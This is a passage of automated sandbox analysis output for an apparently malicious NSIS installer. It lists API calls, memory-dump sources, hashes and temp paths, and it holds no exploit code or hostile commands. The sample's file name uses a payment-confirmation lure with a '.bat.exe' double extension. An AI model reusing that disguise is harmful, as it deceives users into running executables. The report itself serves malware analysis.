                                                            • Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: 925fc45a0aa505b9091cad085ddbdbc9112defbd2743478e9e1d4a2513f47f3a
                                                            • Instruction ID: 9527a0c1ad3e6e7b3c1ec27a1a500f512e969349e74c345ce430e7e6833f4743
                                                            • Opcode Fuzzy Hash: 925fc45a0aa505b9091cad085ddbdbc9112defbd2743478e9e1d4a2513f47f3a
                                                            • Instruction Fuzzy Hash: 4C51F0B5808202EFDB08CFE8C845AD6B7ACFB2A345B20456DF840DBA00E731DD09CB60
                                                            APIs
                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll), ref: 0040269A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsa1392.tmp$C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll
                                                            • API String ID: 1659193697-3537301365
                                                            • Opcode ID: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                            • Instruction ID: 3f04c1712215209208acb7642429b7129ba4cba87377fac841ce35f74c6015ca
                                                            • Opcode Fuzzy Hash: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                            • Instruction Fuzzy Hash: DF110A72A40205BBCB00BBB19E4AA9F76A19F50748F21483FF502F61C1DAFD89D1665E
                                                            APIs
                                                            • CloseHandle.KERNEL32(000002F4,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C74
                                                            • CloseHandle.KERNEL32(000002FC,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C88
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C67
                                                            • C:\Users\user\AppData\Local\Temp\nsa1392.tmp, xrefs: 00403C98
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsa1392.tmp
                                                            • API String ID: 2962429428-2034990317
                                                            • Opcode ID: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                            • Instruction ID: 8c071fc62b7e332c461b44292a81ac7d95f2e272703a36c0b89becc6b1ca42eb
                                                            • Opcode Fuzzy Hash: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                            • Instruction Fuzzy Hash: C9E04F3140471896D5246F78AE4E9853A185F41335B248326F078F21F0C738995A5AA9
                                                            APIs
                                                              • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                              • Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 0040600A
                                                              • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                              • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 004060B2
                                                            • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004060C2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsa1392.tmp
                                                            • API String ID: 3248276644-1847755183
                                                            • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                            • Instruction ID: c6e62d849c1808a59ce2984a64bb42424f7e4e7bb9f9a1371c2689eace45329e
                                                            • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                            • Instruction Fuzzy Hash: 17F04426144E6219D632723A0C05EAF26148F82354B57463FF853B22D1DF3C8D62C17E
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 004056AA
                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004056FB
                                                              • Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Window$CallMessageProcSendVisible
                                                            • String ID:
                                                            • API String ID: 3748168415-3916222277
                                                            • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                            • Instruction ID: 56d6425d582badedfe6e85af8287ead15e3733fa9de593adb61ce7d3cc062d63
                                                            • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                            • Instruction Fuzzy Hash: 1601B131101608ABDF205F41DE80AAF3A39EB84754F90483BF509761D0D77B8C929E6D
                                                            APIs
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00421F28,?,00000800,00000000,?,00421F28,?,?,Call,?,00000000,004067C1,80000002), ref: 00406596
                                                            • RegCloseKey.ADVAPI32(?), ref: 004065A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue
                                                            • String ID: Call
                                                            • API String ID: 3356406503-1824292864
                                                            • Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                            • Instruction ID: 225dfe442f4fc2e839130f584d2f70a73ee2f61c7405cac2e0d59c7fe544a8ff
                                                            • Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                            • Instruction Fuzzy Hash: 39017172510209FEDF218F55DD05EDB3BE8EB54364F014035FD1592190E738D968DBA4
                                                            APIs
                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,80000000,00000003), ref: 00405FA3
                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,80000000,00000003), ref: 00405FB3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrlen
                                                            • String ID: C:\Users\user\Desktop
                                                            • API String ID: 2709904686-1246513382
                                                            • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                            • Instruction ID: 76a3089014cba6cdede5e63107dce03d3cc6699033e3804c636830b34c248568
                                                            • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                            • Instruction Fuzzy Hash: D1D05EB2401921DAE3126B04DD00D9F63ACEF12300746482AE840E7161D77C5C8186AD
                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060FF
                                                            • CharNextA.USER32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406110
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                            • Instruction ID: 41d5ee4ea83cc4d308be6584820b02a87ee89e19241337121ce36a8d52a16fb8
                                                            • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                            • Instruction Fuzzy Hash: 9DF06235504418EFC702DBA9DD00D9EBFA8EF46350B2640B9E841FB211DA74DE11AB99